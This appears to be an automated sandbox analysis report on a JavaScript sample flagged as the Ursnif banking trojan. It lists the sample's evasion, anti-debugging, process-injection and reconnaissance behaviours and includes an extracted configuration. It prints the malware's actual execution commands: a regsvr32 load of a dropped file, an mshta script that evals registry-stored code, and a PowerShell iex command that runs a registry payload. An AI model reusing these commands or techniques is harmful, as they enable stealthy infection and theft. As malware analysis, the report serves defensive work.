Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXEAM+
Source: explorer.exe, 00000013.00000002.1067504419.000000000519F000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE2WM9
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXESM
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXERO/MQ
Source: explorer.exe, 00000013.00000002.1067504419.000000000519F000.00000004.00000001.sdmpBinary or memory string: TC:\PROGRAM FILES\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7210
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1552
Found large amount of non-executed APIsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 9.4 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_0507CDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,5_2_0508940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05078181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_05078181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05087CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,5_2_05087CDC
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00401C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,5_2_00401C57
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00414021 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00414021
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05086450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,5_2_05086450
Contains functionality to read the PEBShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00431048 mov eax, dword ptr fs:[00000030h]5_2_00431048
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00430F7E mov eax, dword ptr fs:[00000030h]5_2_00430F7E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00430B88 push dword ptr fs:[00000030h]5_2_00430B88
Contains functionality to register its own exception handlerShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,5_2_0040223F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00414021 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00414021
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00417A33 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417A33
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041248E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041248E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507C0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,5_2_0507C0D6

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: TsCrxrp.txt.0.drJump to dropped file
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: 400000 protect: page execute and read and writeJump to behavior
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 87D01000
Maps a DLL or memory area into another processShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 1784Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 400000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000013.00000002.1072159051.0000000009BAD000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd#nt
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmpBinary or memory string: =Program Managerb

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: VirtualProtectEx,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,5_2_004010EC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: LdrInitializeThunk,GetLocaleInfoA,5_2_00419765
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507733B cpuid 5_2_0507733B
Queries the installation date of WindowsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Contains functionality to create pipes for IPCShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05074134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,5_2_05074134
Contains functionality to query local / system timeShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00401C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,5_2_00401C57
Contains functionality to query the account / user nameShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,5_2_0507476B
Contains functionality to query windows versionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004017E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,5_2_004017E2
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 1784, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 1784, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "242", "system": "ecde5b0ce2df094efe45e0bf22cd4877hh", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586395395", "user": "8a8ed6d154c8a3b79c4b2eb5a02b1ead", "hash": "0x43f98375", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 221263 Sample: open_attach_p2y.js Startdate: 08/04/2020 Architecture: WINDOWS Score: 100 42 site-cdn.onenote.net 2->42 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 10 other signatures 2->52 11 wscript.exe 3 2->11         started        15 iexplore.exe 4 427 2->15         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...\TsCrxrp.txt, PE32 11->40 dropped 62 Benign windows process drops PE files 11->62 17 regsvr32.exe 11->17         started        19 iexplore.exe 10 258 15->19         started        22 iexplore.exe 258 15->22         started        24 iexplore.exe